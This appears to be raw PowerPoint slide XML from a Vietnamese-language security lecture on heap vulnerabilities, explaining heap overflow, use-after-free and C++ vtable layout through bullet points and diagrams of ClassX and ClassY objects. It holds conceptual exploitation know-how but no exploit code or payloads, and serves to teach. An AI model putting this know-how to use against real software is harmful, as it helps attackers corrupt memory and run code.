            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6836A04C-577A-A39E-BC64-BD81B8522F41}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="60" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="4931051" y="4328398"/>
            <a:ext cx="561147" cy="860911"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="292934"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="63" name="Straight Arrow Connector 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{924A7976-09BE-69D3-AD81-1A1EBA403842}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="48" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1943100" y="2759333"/>
            <a:ext cx="1311551" cy="2385157"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng" algn="ctr">
            <a:solidFill>
              <a:srgbClr val="292934"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:tailEnd type="triangle"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:cxnSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="206646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635B-4E3A-D86B-68B9-B910127A96A4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Lỗ hổng khi truy cập vùng nhớ heap</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{25758E95-93BD-727B-7B32-1EF5D8B42145}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Heap overflow:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Đối tượng được cấp phát bộ nhớ trong heap (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>new</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Không kiểm soát dữ liệu được ghi vào bộ đệm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Dữ liệu tràn ra khỏi bộ đệm ghi đè vào vùng dữ liệu, con trỏ khác</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Hậu quả: mã độc được thực thi, luồng chương trình bị thay đổi</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Use-after-free:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Một đối tượng được giải phóng bộ nhớ quá sớm(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>free, delete</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kẻ tấn công xin cấp phát bộ nhớ, mà có thể sẽ được cấp phát vùng nhớ vừa được giải phóng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Kẻ tấn công ghi dữ liệu độc hại vào vùng nhớ</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Chương trình truy cập vào vùng nhớ mà đã được giải phóng và sử dụng dữ liệu độc hại</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{657F41D2-8454-0B98-2538-2C727623312F}"/>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952306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9693-1615-8317-144F-C433DDAA3CAC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Heap overflow: C++ vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76C72973-3496-8920-6F3D-DE5A01D67568}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C++ là một ngôn ngữ lập trình hướng đối tượng</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mỗi lớp sẽ được khai báo cùng với các thuộc tính và phương thức</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khi đối tượng được khởi tạo, một vùng nhớ trong heap được cấp phát</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Quản lý vùng nhớ của đối tượng:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Mỗi lớp có một bảng ảo(vtable: chứa con trỏ tới các phương thức triển khai từ phương thức ảo)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Khi đối tượng được khởi tạo, con trỏ vtable(thường đặt ở đầu đối tượng) trỏ tới vùng nhớ chứa bảng ảo của lớp</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>Thực thi phương thức: Xác định địa chỉ của phương thức theo độ lệch với con trỏ vtable</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65608180-9DA1-5062-CFB7-0A9D9CC6D674}"/>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4656815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3365-D2DD-8CDB-579B-721A4A677C54}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB"/>
              <a:t>C++ vtables</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2744CDB4-D9E6-47D7-9801-D6422847C0EF}"/>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20" name="Google Shape;430;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4302B6D-BD0B-6B90-DFEB-F9EE4CE30FE0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385375" y="4869531"/>
            <a:ext cx="4343400" cy="80018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1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>x</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en"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là</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000"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sym typeface="Arial"/>
              </a:rPr>
              <a:t> một đối tượng của</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassX</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>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1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>y</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en"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là</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="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sym typeface="Arial"/>
              </a:rPr>
              <a:t> một đối tượng của</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en"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 </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="1" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>ClassY</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="21" name="Google Shape;431;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9F6D6B04-32BD-DDAD-2D94-AB05EEC90D90}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3889903037"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="385375" y="1582187"/>
          <a:ext cx="2103150" cy="24380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vtable of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>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vtable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7"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Google Shape;432;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D8538DC3-067F-03B5-CE37-D6C3F79F5F0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="385450" y="3966851"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Heap</a:t>
            </a:r>
            <a:endParaRPr kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="23" name="Google Shape;433;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4A1A0719-D494-B3D1-D24B-2926B5C6C687}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1563500369"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="3062962"/>
          <a:ext cx="2103150" cy="9142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bar</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foo</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="24" name="Google Shape;434;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FC11647-1452-2777-B89A-BB6653CECB73}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2476500" y="3839307"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="25" name="Google Shape;435;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D22BC5DC-F8EF-8FE9-09B4-4D337526E03B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="486681174"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="3465750" y="1582175"/>
          <a:ext cx="2103150" cy="9142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bar</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foo</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cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="26" name="Google Shape;436;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{101550B0-BB8F-EBEB-6BE1-C4624BE6EACD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2488450" y="2276562"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="27" name="Google Shape;437;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A3B7E900-BEB8-19A5-3185-B3D84AACAF4C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGraphicFramePr/>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="748913436"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="6546125" y="1295400"/>
          <a:ext cx="2103150" cy="304760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bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassY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foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassY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bar</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassX</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7"/>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foo</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> of </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en" sz="1400" b="1">
                          <a:solidFill>
                            <a:schemeClr val="dk1"/>
                          </a:solidFill>
                          <a:latin typeface="Courier New"/>
                          <a:ea typeface="Courier New"/>
                          <a:cs typeface="Courier New"/>
                          <a:sym typeface="Courier New"/>
                        </a:rPr>
                        <a:t>ClassX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8"/>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9"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="28" name="Google Shape;438;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC4396E4-65DB-F251-C6B6-F36D1AD83789}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="2262187"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Google Shape;439;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AF7CB60-3FA8-D463-EF7A-D426691A2E19}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5568825" y="3814047"/>
            <a:ext cx="971700" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="12700" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="Google Shape;440;p50">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F08532F4-01C3-217E-5D6B-F947BD6AFC3C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6546275" y="4297376"/>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kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
